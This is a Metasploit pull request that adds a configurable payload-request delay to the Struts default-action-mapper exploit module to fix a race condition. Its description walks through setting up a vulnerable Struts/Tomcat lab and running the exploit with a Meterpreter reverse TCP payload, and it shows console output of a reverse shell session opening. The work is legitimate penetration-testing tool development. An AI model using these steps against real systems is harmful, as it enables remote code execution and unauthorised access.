### PR TITLE
Fix struts_default_action_mapper payload request delay

### DIFF
--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -74,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
       Opt::RPORT(8080),
       OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),
       OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),
+      OptInt.new('PAYLOAD_REQUEST_DELAY', [true, 'Time to wait for the payload request', 5]),
       # It isn't OptPath becuase it's a *remote* path
       OptString.new("WritableDir", [ true, "A directory where we can write files (only on Linux targets)", "/tmp" ])
     ], self.class)
@@ -359,6 +360,8 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
       end
     end
+
+    sleep(datastore['PAYLOAD_REQUEST_DELAY'])
   end
 
   def build_hta


### PR DESCRIPTION
## What This Patch Does

This patch fixes a race condition in struts_default_action_mapper. Sometimes even if the exploitation is successful, the exploit module exits too soon and ends up not receiving a session from the victim machine. This seems to affect both Linux and Windows targets, but tends to happen more with Windows.

MS-1609
## Verification
- [x] Start a Windows box (such as Windows 7)
- [x] Make sure Java is installed.
- [x] After installing Java, make sure you have the system environment variable set for JAVA_HOME (it should be your Java directory, like this:

<img width="359" alt="screen shot 2016-08-12 at 3 36 33 pm" src="https://cloud.githubusercontent.com/assets/1170914/17636426/9956bc68-60a2-11e6-8f95-1c4c11b2f670.png">
- [x] Install Apache Tomcat: http://www-us.apache.org/dist/tomcat/tomcat-8/v8.0.35/bin/apache-tomcat-8.0.35.zip
- [x] Extract Tomcat. In there, you will find conf\tomcat-users.xml, make sure you have the following settings:

```
  <role rolename="manager-gui"/>
  <user username="tomcat" password="pass123" roles="tomcat,manager-gui"/>
```
- [x] Download https://archive.apache.org/dist/struts/binaries/struts-2.3.15-all.zip
- [x] Extract struts-2.3.15-all.zip
- [x] In the extracted struts-2.3.15-all.zip, you will find app\struts2-blank.war, deploy that file on Apache Tomcat. At this point, you should be ready for testing the Metasploit module.
- [x] Start msfconsole
- [x] Do: `use exploit/multi/http/struts_default_action_mapper`
- [x] Do: `set RHOST [IP of tomcat]`
- [x] Do: `set TARGET 1` for Windows
- [x] Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] Do: `set LHOST [your IP]`
- [x] Do: `exploit`
- [x] You should get a session like the following:

```
msf exploit(struts_default_action_mapper) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.146.1:4444 
msf exploit(struts_default_action_mapper) > [*] 192.168.146.169:8080 - Encoding payload into vbs/javascript/hta...
[*] 192.168.146.169:8080 - Starting up our web service on 192.168.146.1:8080 ...
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.6.0.78:8080/
[*] 192.168.146.169:8080 - Execute payload through malicious HTA...
[*] 192.168.146.169:8080 - Waiting for the victim to request the payload...
[*] 192.168.146.169:8080 - Sending the payload to the server...
[*] Sending stage (957999 bytes) to 192.168.146.169
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.169:49581) at 2016-08-12 15:42:36 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of 'oaje.exe' on the target
```
